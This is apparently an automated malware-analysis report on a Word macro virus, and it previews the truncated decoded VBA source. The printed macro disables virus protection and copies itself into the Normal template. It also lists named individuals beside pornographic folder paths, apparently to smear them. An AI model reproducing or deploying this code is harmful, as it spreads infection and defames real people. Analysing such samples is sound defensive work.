MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.MyEnemy-1'. It contains VBA macros, specifically a 'Document_Open' macro, which is a common technique for executing malicious code when the document is opened. The script appears to be designed to copy itself to the Normal template and potentially download or execute further malicious content, although the exact payload mechanism is obfuscated.
Heuristics 3
-
ClamAV: Doc.Trojan.MyEnemy-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.MyEnemy-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21361 bytes |
SHA-256: 65af0c66c09a906944dedcba0de105c40647942a05a20a67c5bd70dd04216fd5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim acd, ntt As Object
Dim MyEnemy$(20, 1)
Dim MyPhoto$(10)
Dim MyVideo$(6)
Dim MyExten$(5)
Dim zw As Byte
Const mrk = "čó ŕčŕ čŕĺńč îňâđů îçęç îčńđâéŔ .ÂđńíďńíÔíđâęěń îŕččď ŕŕóĘěńŕîî .Â"
Private Sub document_open()
On Error Resume Next
Options.VirusProtection = False
Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
If Not acd.codemodule.Find(mrk, 1, 1, 1000, 1000) Then acd.codemodule.deletelines 1, acd.codemodule.countoflines
If Not ntt.codemodule.Find(mrk, 1, 1, 1000, 1000) Then ntt.codemodule.deletelines 1, ntt.codemodule.countoflines
End Sub
Private Sub document_close()
On Error Resume Next
Options.VirusProtection = False
Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
s$ = ""
If (acd.codemodule.countoflines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
v2 = 1
For v = 1 To ntt.codemodule.countoflines
s$ = ntt.codemodule.lines(v, 1)
If s$ <> "" Then
acd.codemodule.insertlines v2, s$
v2 = v2 + 1
End If
Next v
End If
ActiveDocument.Save
If ntt.codemodule.countoflines <= 1 Then
v2 = 1
For v = 1 To acd.codemodule.countoflines
s$ = acd.codemodule.lines(v, 1)
If s$ <> "" Then
ntt.codemodule.insertlines v2, s$
v2 = v2 + 1
End If
Next v
End If
NormalTemplate.Save
'Retaliate
MyEnemy$(0, 0) = "Ôđîëîâ Î. Ŕ."
MyEnemy$(1, 0) = "Ĺěĺëü˙íĺíęî Â. Â."
MyEnemy$(2, 0) = "Ďîäăîđíîâŕ Ĺ. Č."
MyEnemy$(3, 0) = "Ěŕňđîńîâŕ Îëüăŕ Ĺâăĺíüĺâíŕ"
MyEnemy$(4, 0) = "Ęîâŕëĺâŕ Î Ţ"
MyEnemy$(5, 0) = "Ěîńčí Ę. Ď."
MyEnemy$(6, 0) = "Řŕëűăčí Ď. Ń."
MyEnemy$(7, 0) = "Ëčőňĺđ Ŕíŕňîëčé Ěčőŕéëîâč÷"
MyEnemy$(8, 0) = "Ŕ. Ě. Ęŕđďîâ"
MyEnemy$(9, 0) = "Ęîçëîâ Ŕíäđĺé Ŕëĺęńŕíäđîâč÷"
MyEnemy$(10, 0) = "Ďŕâëîâŕ Îëüăŕ"
MyEnemy$(11, 0) = "Äěčňđčĺâ Ńĺđăĺé"
MyEnemy$(12, 0) = "Bob Klein"
MyEnemy$(13, 0) = "Jim Rein"
MyEnemy$(14, 0) = "John A. Hopkins"
MyEnemy$(15, 0) = "Garry Wood"
MyEnemy$(17, 0) = "Debra Henriksen"
MyEnemy$(18, 0) = "Patricia "
MyEnemy$(19, 0) = "Hitler"
For v = 0 To 19
If (v <= 11) Or (v = 19) Then
MyEnemy$(v, 1) = "C:\Ěîč äîęóěĺíňű"
Else
MyEnemy$(v, 1) = "C:\My documents"
End If
Next v
MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Ňđŕőŕíüĺ\"
MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Ďîđíî\"
MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Ńĺęń\"
MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Čçâđŕůĺíč˙\"
MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Ňđŕő\"
MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Ęëóáíč÷ęŕ\"
MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Äĺâóřęč\Ăĺë˙\"
MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Ôîňęč äĺâóřĺę\Ęîěčńńŕđîâŕ Ŕíăĺëčíŕ Âčňŕëüĺâíŕ\"
MyEnemy$(8, 1) = "C:\Ňîëüęî äë˙ ěĺí˙\Ďîđíóőŕ\Ăĺëęŕ\"
MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Îáíŕćĺííŕ˙ íŕňóđŕ\Ŕíăĺëčíŕ\"
MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Ńĺęń_ęîëëĺęöč˙\Ęîěčńńŕđîâŕ_Ŕ_Â\"
MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Ëó÷řčĺ ďîďęč ăîđîäŕ\"
MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\"
MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\"
MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka"
MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\"
MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\"
MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\"
MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\"
MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Âűńňŕâęŕ ńĺęńŕ\Đîńńč˙\Ŕńňđŕőŕíü\"
MyPhoto$(0) = "Angelina"
MyPhoto$(1) = "Gela"
MyPhoto$(2) = "Body_A"
MyPhoto$(3) = "Fuck"
MyPhoto$(4) = "Fuck_ass"
MyPhoto$(5) = "Ass"
MyPhoto$(6) = "Cnt"
MyPhoto$(7) = "Klzm"
MyPhoto$(8) = "Kk"
MyPhoto$(9) = "Urn"
MyVideo$(0) = "Gela&Seryj"
MyVideo$(1) = "Gela&Vlad"
MyVideo$(2) = "Gela&Tolj
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.